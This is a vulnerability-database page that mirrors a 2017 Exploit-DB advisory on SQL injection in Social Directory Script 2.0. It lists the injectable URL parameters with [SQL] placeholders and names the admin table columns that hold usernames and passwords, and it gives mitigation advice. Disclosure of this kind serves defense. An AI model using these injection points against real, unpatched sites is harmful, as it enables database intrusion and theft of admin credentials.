header-logo
Suggest Exploit
vendor:
Social Directory Script
by:
Ihsan Sencan
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Social Directory Script
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phponly:social_directory_script:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Social Directory Script 2.0 – SQL Injection

Social Directory Script 2.0 is vulnerable to SQL Injection. Attackers can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by manipulating the 'subcategory', 'searchtopic' and 'category' parameters of the application. An attacker can also gain access to the admin panel by exploiting the 'id', 'username' and 'password' parameters.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. Developers should also use parameterized queries to prevent SQL Injection.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Social Directory Script 2.0 - SQL Injection
# Google Dork: N/A
# Date: 11.04.2017
# Vendor Homepage: http://www.phponly.com/
# Software: http://www.phponly.com/Social-Directory.html
# Demo: http://www.phponly.com/demo/link/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?subcategory=[SQL]
# http://localhost/[PATH]/searchtopic.php?search=[SQL]
# http://localhost/[PATH]/index.php?category=[SQL]
# phponly_link_admin:id
# phponly_link_admin:username
# phponly_link_admin:password
# # # # #